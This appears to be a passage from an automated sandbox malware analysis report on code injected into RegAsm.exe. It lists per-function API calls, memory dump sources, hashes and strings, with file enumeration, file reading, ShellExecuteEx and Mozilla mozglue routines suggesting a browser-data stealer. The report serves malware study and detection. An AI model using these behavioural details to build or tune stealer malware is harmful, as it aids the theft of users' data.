                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96db00d5d2c851d06350b42485bd9cad6c6743e20fe960368fb1ff27f655dd59
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641E4317051309BDB319BA9CA4C7AE7B75EB4130CF541836EA0997B41EB709855CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F4480 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • qx/FlyLkWE9mL8srMMmz5/UPMK9xP1WZ04111fV/Rkja1NWg6cb6VtV/uK9VRbxytKZyKf5qhIgBst9beX94T5X3GmkfI7v54+lMtz8C3exgfKMU51ZQCtnYo7arj/mcsaTwjzteq85cSKEe7/3Mt0JnZnl96TMPaGdm6r/vvlbV/evMLPfvv6fKW6/OzHT7GdCteInEzIyB9uNSDZKwE/0sEKGrDCsZRm3RTjXpDcU77Wm52SkeJnss8y1lF/Ohz0Fa, xrefs: 6C7F45B2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$moz_xmalloc
                                                                                                                                                                                                                                                                                                  • String ID: qx/FlyLkWE9mL8srMMmz5/UPMK9xP1WZ04111fV/Rkja1NWg6cb6VtV/uK9VRbxytKZyKf5qhIgBst9beX94T5X3GmkfI7v54+lMtz8C3exgfKMU51ZQCtnYo7arj/mcsaTwjzteq85cSKEe7/3Mt0JnZnl96TMPaGdm6r/vvlbV/evMLPfvv6fKW6/OzHT7GdCteInEzIyB9uNSDZKwE/0sEKGrDCsZRm3RTjXpDcU77Wm52SkeJnss8y1lF/Ohz0Fa
                                                                                                                                                                                                                                                                                                  • API String ID: 3009372454-2846243242
                                                                                                                                                                                                                                                                                                  • Opcode ID: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 52e22d06cbbd973c127078d574c65d6effa1cb61dedfccbb41ea7d2f062ecf6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe7d0be043b8a1511e1a521a0d05019b499d6127552232882d25dd88671e4b6a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABB10372A041158FDB189E7CCBD476D77B2AF42328F180638E836DBB96D73098419B91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C84D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D4F0
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D4FC
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D52A
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D530
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D53F
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D55F
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C84D585
                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C84D5D3
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D5F9
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D605
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D652
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C84D658
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C84D667
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C84D6A2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                                                                                                                                                                  • Instruction ID: 651e0dc9b18936324d3cb327fae5c8f0d5062ed1427013808ed959d8a297e9a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0255e3f880d46f8e11db843fdaa2752a69ec00a15a269acf662e788e2246c646
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27517271604709DFC714DF34C588AAABBF5FF89318F10892EE85A87711EB30A945CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C815670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C8156D1
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8156E9
                                                                                                                                                                                                                                                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C8156F1
                                                                                                                                                                                                                                                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C815744
                                                                                                                                                                                                                                                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C8157BC
                                                                                                                                                                                                                                                                                                  • GetTickCount64.KERNEL32 ref: 6C8158CB
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F688), ref: 6C8158F3
                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C815945
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F688), ref: 6C8159B2
                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C87F638,?,?,?,?), ref: 6C8159E9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                                  • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1519482839d138e184a707f9357b4aca4174cd60ec5ab780719262c0868bd060
                                                                                                                                                                                                                                                                                                  • Instruction ID: e1e6f333c8f02fc3b40f7ce6549b453c34b3cb9d48375536644935181ad20a7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1519482839d138e184a707f9357b4aca4174cd60ec5ab780719262c0868bd060
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAC19E31A0C3519FC726CF28C54466EB7F1BFDA718F158A2DE4C497A20E730A885CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00416D67 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 123stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416EE0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 1847592606-4094451269
                                                                                                                                                                                                                                                                                                  • Opcode ID: 807796022c940539a05e88b5f1ee52cb58749088a7e0c81a81caed0ea8ee82df
                                                                                                                                                                                                                                                                                                  • Instruction ID: 27cb9206523c8af58370a1d4dfcfe0814bc062b05e3e05c97775bdae33b0a18a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 807796022c940539a05e88b5f1ee52cb58749088a7e0c81a81caed0ea8ee82df
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541C5B5900218ABDB14EBA0DC85FEE7739AF48700F0045AEF615A3190DB78A748CFE4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00416D69 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 123stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A4), ref: 00416D7C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004276A8), ref: 00416D96
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8D8), ref: 00416DD4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0156F8B8), ref: 00416DE8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416DFC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E0A
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276AC), ref: 00416E1C
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416E30
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416ED1
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416EE0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: 1pA
                                                                                                                                                                                                                                                                                                  • API String ID: 1847592606-4094451269
                                                                                                                                                                                                                                                                                                  • Opcode ID: dfe88e1d95bf40144c7bd694240c5e7825ef60ad6c61e3464477d4b960d24aa2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 51f963cb028a0e59156ed66b2066361993c6f2fce020c0753efefad7a9364b42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfe88e1d95bf40144c7bd694240c5e7825ef60ad6c61e3464477d4b960d24aa2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441A4B5900218ABDB14EBA0DC85BEE7739AF48700F0045AEF615A3190D778A748CFE0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83EC84
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83EC8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83ECA1
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ECAE
                                                                                                                                                                                                                                                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C83ECC5
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED0A
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C83ED19
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C83ED28
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C83ED2F
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED59
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C83EC94
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                                  • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                                  • Opcode ID: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 406344891564b9da85307de5a3a154a87272c1512662dcd38a8543ff896f4727
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6221D2716001289BDB329FA9DA0CAAF377AEB4526DF105A30F91897740EB359C15CBF1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00413150 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041352A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
